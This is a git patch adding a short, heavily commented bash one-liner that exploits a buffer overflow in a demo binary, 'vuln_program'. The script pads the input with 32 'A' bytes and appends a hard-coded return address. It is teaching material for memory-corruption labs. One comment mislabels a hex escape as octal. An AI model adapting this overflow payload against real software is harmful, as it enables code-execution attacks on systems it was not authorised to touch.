From 710080eff55763a5ee8262c7c6355a5cd4cadc89 Mon Sep 17 00:00:00 2001 From: Omar Santos Date: Tue, 24 Jan 2023 20:41:49 -0500 Subject: [PATCH] Create one_liner_exploit.sh --- buffer_overflow_example/one_liner_exploit.sh | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 buffer_overflow_example/one_liner_exploit.sh diff --git a/buffer_overflow_example/one_liner_exploit.sh b/buffer_overflow_example/one_liner_exploit.sh new file mode 100644 index 0000000..db664c9 --- /dev/null +++ b/buffer_overflow_example/one_liner_exploit.sh @@ -0,0 +1,15 @@ +#!/bin/bash +# Simple one-liner script to exploit the vuln_program buffer overflow +# Author: Omar Santos @santosomar +# Explanation: +# echo -en is used to enable interpretation of backslash escapes and turns off +# the default behavior of the echo command which is to add a newline at the end of the output. +# $(for i in {1..32}; do echo -n "A"; done) is a bash command that will iterate 32 times and print 'A' each time without a newline. +# $'\x9d\x84\x04\x08' is an octal escape representation that will produce the 4 bytes of hex representation, in this case '\x9d\x84\x04\x08' +# This command will output a string of 32 'A's followed by that 4 bytes value. +# Note that the echo command in Bash behaves differently across different shells (like bash, zsh, etc) +# and different platforms (like Linux, MacOS, Windows) so the command could produce different results +# depending on the environment where you run it. + + +echo -en $(for i in {1..32}; do echo -n "A"; done)$'\x9d\x84\x04\x08' | ./vuln_program